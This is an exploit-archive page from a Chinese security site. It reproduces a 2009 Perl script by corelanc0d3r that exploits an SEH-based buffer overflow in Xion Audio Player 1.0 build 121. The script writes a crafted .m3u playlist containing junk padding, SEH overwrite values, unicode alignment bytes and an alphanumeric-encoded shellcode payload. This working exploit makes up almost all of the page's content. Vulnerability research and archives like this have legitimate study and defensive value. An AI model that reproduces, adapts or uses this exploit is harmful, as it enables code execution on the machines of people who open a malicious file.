首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Xion Audio Player version 1.0 build 121 local buffer overflow exploit
来源:corelanc0d3r[at]gmail.com 作者:corelanc0d3r 发布时间:2009-11-04  
# [*] Vulnerability     : Xion Audio Player Local BOF
# [*] Discovered by     : Dragon Rider (http://securityreason.com/exploitalert/7392)
# [*]                     drag0n.rider(at)hotmail.com
# [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit released   : nov 3rd, 2009
# [*] Type              : local and remote code execution
# [*] OS                : Windows
# [*] Product           : Xion Audio Player
# [*] Versions affected : 1.0 build 121
# [*] Download from     : http://www.brothersoft.com/xion-audio-player-download-49404.html
# [*] -------------------------------------------------------------------------
# [*] Method            : SEH
# [*] Tested on         : XP SP3 En
# [*] Greetz&Tx to      : DellNull/EdiStrosar/F/P/W
# [*] -------------------------------------------------------------------------
#                                               MMMMM~.                          
#                                               MMMMM?.                          
#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
#                                                                   eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty. 
# Use for educational purposes only.
#
my $sploitfile="corelansploit.m3u";
my $junk = "\x41" x 254;  
my $nseh="\x58\x48"; 
my $seh="\xf5\x48"; 
my $align="\x55";  
$align=$align."\x6d";   
$align=$align."\x58";   
$align=$align."\x6d";   
$align = $align."\x05\x10\x11";   
$align=$align."\x6d";  
$align=$align."\x2d\x02\x11";  
$align=$align."\x6d";   

my $jump = "\x50";  
$jump=$jump."\x6d"; 
$jump=$jump."\xc3";

my $padding="A" x 73;

my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8Q4KPKPKP4KQ5OLTKSLLERXM1JOTK0OLXDK1OO0M1JKPITK044KKQJN01WPTYVLE4Y0BTKW91WZLMKQ7RJKZTOKB4NDLDCE9UDKQOMTKQJKRFDKLLPKTKQOMLKQJKTKMLDKKQZKSYQLO4M4WSNQGPBDTKOPNPSUY0D8LLTKOPLLTKRPML6MTK2HKXZKM94K3PVPKPKPKPDK1XOL1ONQJVC0PVTIL853WP3K0PBHZPTJKTQO2HV8KNSZLNPWKOYWQSQQRLQSKPA";

my $filler = ("\xcc" x (17990-length($shellcode)));
my $payload = $junk.$nseh.$seh.$align.$jump.$padding.$shellcode.$filler;
open(myfile,">$sploitfile"); 
print myfile $payload; 
print "Wrote " . length($payload)." bytes to $sploitfile\n";
close(myfile);

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Symantec ConsoleUtilities Acti
·PunBB Extension Attachment ver
·RhinoSoft.com Serv-U 9.0.0.5 W
·Joomla 1.5.12 Remote Code Exec
·Mac OS X 10.5.6/10.5.7 ptrace(
·Linux Kernel 'pipe.c' Local Pr
·Flash应用安全规范
·Remote buffer overflow exploit
·Blender .blend Project Arbitra
·CubeCart 4 suffers from a real
·E-doo music get shell Vulnerab
·Remote denial of service explo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved